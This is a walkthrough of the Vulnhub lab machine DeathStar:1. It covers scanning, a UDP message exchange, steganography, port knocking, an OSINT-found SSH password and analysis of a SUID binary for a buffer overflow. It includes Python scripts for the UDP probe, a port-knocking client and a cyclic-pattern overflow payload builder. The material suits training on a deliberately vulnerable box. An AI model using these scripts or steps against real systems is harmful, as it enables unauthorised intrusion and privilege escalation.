
Deathstar:1 Vulnhub Walkthrough

Updated: Jun 3, 2020

In this article we are going to solve DeathStar:1, a very interesting medium-rated box from Vulnhub.


walkthrough



IP of the target: 192.168.43.116

The description on the Vulnhub page says that port scanning will not take us anywhere (but my mind said: run an nmap scan anyway).

sudo nmap -sC -sV -Pn -p- 192.168.43.116

Okay, now my mind will not interfere again :)

After some time I decided to capture the traffic to and from the target with Wireshark, using the display filter ip.addr == <Target-IP>.

Hmm, this information looks very useful for us.


Protocol: UDP

message1: DS-1@OBS

message2: 1440


What if 1440 is a UDP port and DS-1@OBS is something like a key or a message that we have to send to it?

To test that, we use nc to connect to UDP port 1440, send the message "DS-1@OBS", and save whatever comes back in a file so we can analyze it later.


nc -u 192.168.43.116 1440 > mymsg.txt , then type DS-1@OBS and press Enter

The reply looks like base64-encoded text, so we decode it and save the result in a new file.

The decoded data is an image: rename the file with a .jpeg extension and open it.
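The UDP exchange above, as an added example that is not part of the original walkthrough: it sends the message, gathers every reply datagram, decodes the base64 the way the wire delivers it (line breaks, possibly missing padding) and identifies the result by its magic bytes instead of blindly renaming it to .jpeg. The host, port and message are the ones from the article; the embedded reply is a constructed JFIF header, not the real response from the box.

```python
import base64
import socket

# Magic bytes of the file types we expect to see after decoding.
MAGIC = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"PK\x03\x04": "zip",
}


def udp_exchange(host, port, message, timeout=3.0, max_datagrams=256):
    """Send one UDP datagram and collect every reply datagram until the
    socket goes quiet for `timeout` seconds. Returns the raw reply bytes."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(message, (host, port))
        chunks = []
        for _ in range(max_datagrams):
            try:
                data, _peer = sock.recvfrom(65535)
            except socket.timeout:
                break
            chunks.append(data)
    return b"".join(chunks)


def decode_base64_payload(raw):
    """Decode base64 as received over the wire: drop line breaks and other
    whitespace, restore missing '=' padding, then decode strictly so that
    garbage is reported instead of silently producing a corrupt file."""
    compact = b"".join(raw.split())
    compact += b"=" * (-len(compact) % 4)
    return base64.b64decode(compact, validate=True)


def sniff_type(data):
    """Return a file type name from the leading magic bytes, or 'unknown'."""
    for magic, name in MAGIC.items():
        if data.startswith(magic):
            return name
    return "unknown"


def recover_payload(raw, out_path=None):
    """Decode a base64 reply, identify it, and optionally write it to disk
    with a matching extension. Returns (type, decoded_bytes, written_path)."""
    decoded = decode_base64_payload(raw)
    kind = sniff_type(decoded)
    written = None
    if out_path is not None:
        written = "%s.%s" % (out_path, kind if kind != "unknown" else "bin")
        with open(written, "wb") as fh:
            fh.write(decoded)
    return kind, decoded, written


# Constructed sample (not the real reply from the box): a minimal JFIF header
# followed by an end-of-image marker, base64-encoded with the line breaks a
# server or the `base64` tool would emit.
SAMPLE_JPEG = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
               + b"\x00" * 40 + b"\xff\xd9")
SAMPLE_REPLY = base64.encodebytes(SAMPLE_JPEG)

if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:
        # Live use against the box: python3 udp_probe.py 192.168.43.116 1440
        raw = udp_exchange(sys.argv[1], int(sys.argv[2]), b"DS-1@OBS\n")
    else:
        raw = SAMPLE_REPLY
    kind, decoded, path = recover_payload(raw, "newmsg")
    print("reply: %d bytes of base64 -> %d bytes, type=%s, saved as %s"
          % (len(raw), len(decoded), kind, path))
```

Checking the magic bytes matters more than it looks: `file` on the decoded blob tells you the same thing, but a strict decode plus a type check catches the case where nc truncated the reply or the service answered with something other than an image.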

This looks super cool :)

Information gained =>

[+] Hangar Bay 327

[+] Thermal Exhaust Port (2-meter-wide)

[+] code to unlock: 197719801983, which looks like three years (1977, 1980, 1983)

With this information we got nothing: even port knocking on 1977, 1980 and 1983 didn't work. So we used steghide to check whether the image hides a file.


steghide extract -sf newmsg.jpeg , passphrase: *******

I have spent a lot of time on this machine, so I am not going to tell you the passphrase in just 5 minutes.

This extracted a .txt file with a message saying that a particular sequence has to be used to unlock port 10110. That clearly means port knocking, so we used a Python port-knocking script found on GitHub, and after sending the correct sequence port 10110 opened.

That means the SSH port is open: we can now connect on port 10110 and get a user shell.
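The port-knocking step, as an added example rather than the GitHub script the article used: it parses a knock sequence, sends one TCP SYN (or one empty UDP datagram) per port in order, then confirms that the target port accepts a full connection. The actual sequence from the extracted text file is not on the page, so the one in the usage line is only the author's earlier guess of 1977/1980/1983 standing in as a placeholder; the knock function is injectable so the sequencing can be exercised without a network.

```python
import socket
import time


def parse_sequence(text):
    """Parse a knock sequence as it might appear in the unlock message,
    e.g. '1977,1980,1983' or '1977 1980 1983', into a list of port numbers."""
    ports = [int(tok) for tok in text.replace(",", " ").split()]
    if not ports:
        raise ValueError("empty knock sequence")
    for port in ports:
        if not 1 <= port <= 65535:
            raise ValueError("port out of range: %d" % port)
    return ports


def tcp_knock(host, port, timeout):
    """One TCP knock. The knock daemon only needs to see the SYN, so a
    refused connection or a timeout still counts as a successful knock."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((host, port))
    except OSError:
        pass
    finally:
        sock.close()


def udp_knock(host, port, timeout):
    """One UDP knock: a single empty datagram."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.sendto(b"", (host, port))


def knock(host, ports, proto="tcp", delay=0.5, knocker=None):
    """Hit every port in order with a short pause between knocks (knockd
    times the whole sequence, so neither rush nor dawdle). `knocker` is
    injectable for testing without a network. Returns the (proto, port)
    pairs in the order they were sent."""
    if knocker is None:
        knocker = tcp_knock if proto == "tcp" else udp_knock
    sent = []
    for port in ports:
        knocker(host, port, 1.0)
        sent.append((proto, port))
        if delay:
            time.sleep(delay)
    return sent


def is_open(host, port, timeout=2.0):
    """Full TCP connect check for the port the knock should have unlocked."""
    try:
        socket.create_connection((host, port), timeout=timeout).close()
        return True
    except OSError:
        return False


if __name__ == "__main__":
    import sys
    # python3 knock.py 192.168.43.116 "1977,1980,1983" 10110
    # (placeholder sequence: the real one comes from the extracted text file)
    host, seq, target = sys.argv[1], sys.argv[2], int(sys.argv[3])
    print("knocking:", knock(host, parse_sequence(seq)))
    print("port %d open: %s" % (target, is_open(host, target)))
```

If the knock daemon expects UDP, pass proto="udp"; if the port does not open, re-check the sequence and protocol in the hint before assuming the daemon is down, since a knock window typically closes again after a few seconds.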

information gained =>

[+] username : erso

[+] password hint: #TryHarder :)


After some OSINT on the password hint, we found the user's password on the internet and used it to connect over SSH as user erso.

First we checked the user's sudo privileges with sudo -l, but got nothing. Then we listed SUID binaries with: find / -perm -u=s -type f 2>/dev/null

I don't know why /usr/bin/mtr didn't work, but /bin/dartVader looks interesting. We tried a couple of things on this binary and failed; running strings on it, however, turned up some useful information.

This looks vulnerable to a buffer overflow attack.

To check whether we are on the right track, we transferred the binary to our local machine to analyze it with gdb :)
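The usual first step of that gdb analysis, as an added example (not the author's code, and the dartVader binary itself is not on the page): generate a cyclic pattern to feed the binary, crash it under gdb, and turn the value that lands in the instruction pointer (or on top of the stack) into the exact offset of the saved return address. The pattern is a de Bruijn sequence, so every 4-byte window is unique and a single register value pins down one position; the 0x61616162 crash value and 0xdeadbeef target address below are illustrative assumptions, not values observed on the box.

```python
import string
from functools import lru_cache


@lru_cache(maxsize=None)
def _de_bruijn(alphabet, n):
    """Full de Bruijn sequence B(k, n) over `alphabet`: every n-character
    window occurs exactly once, so a window read out of a register after a
    crash identifies a unique position in the pattern."""
    k = len(alphabet)
    a = [0] * (k * n)
    seq = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in seq)


def cyclic(length, alphabet=string.ascii_lowercase, n=4):
    """Pattern of `length` characters to feed the binary (same output as
    pwntools' cyclic()). Raises if the alphabet cannot cover `length`."""
    full = _de_bruijn(alphabet, n)
    if length > len(full):
        raise ValueError("pattern length %d exceeds %d unique positions"
                         % (length, len(full)))
    return full[:length]


def cyclic_find(value, alphabet=string.ascii_lowercase, n=4):
    """Offset of a crash value inside the pattern. `value` may be the
    n-character window as str/bytes, or the integer gdb prints for the
    register or stack slot; integers are decoded little-endian, as x86
    stores them, and only the first n bytes in memory are used. Returns -1
    if the value is not part of the pattern."""
    if isinstance(value, int):
        nbytes = max(n, (value.bit_length() + 7) // 8)
        value = value.to_bytes(nbytes, "little")[:n]
    if isinstance(value, bytes):
        value = value.decode("latin-1")
    if len(value) != n:
        raise ValueError("need exactly %d characters, got %d" % (n, len(value)))
    return _de_bruijn(alphabet, n).find(value)


def overflow_payload(offset, target_addr, width=4, padding=b"A"):
    """Payload that places `target_addr` on the saved return address once
    `offset` is known: filler up to the offset, then the address packed
    little-endian at the pointer width (4 for x86, 8 for x86-64)."""
    return padding * offset + target_addr.to_bytes(width, "little")


if __name__ == "__main__":
    # Step 1: feed this to the binary under gdb, e.g. run $(python3 -c 'print(cyclic(200))')
    print(cyclic(200))
    # Step 2: gdb reports the crash; assume it printed EIP = 0x61616162 (hypothetical)
    offset = cyclic_find(0x61616162)
    print("offset to saved return address:", offset)
    # Step 3: build the real payload with an assumed target address
    print(overflow_payload(offset, 0xdeadbeef))
```

On x86-64 the instruction pointer is usually not overwritten with a non-canonical pattern value; instead read the 8 bytes at $rsp when the crash happens and pass that integer to cyclic_find, which uses its first four bytes in memory. Before spending time on the payload, also check the binary's protections (stack canary, NX, PIE) with checksec or gdb, since they decide whether the overflow is exploitable at all.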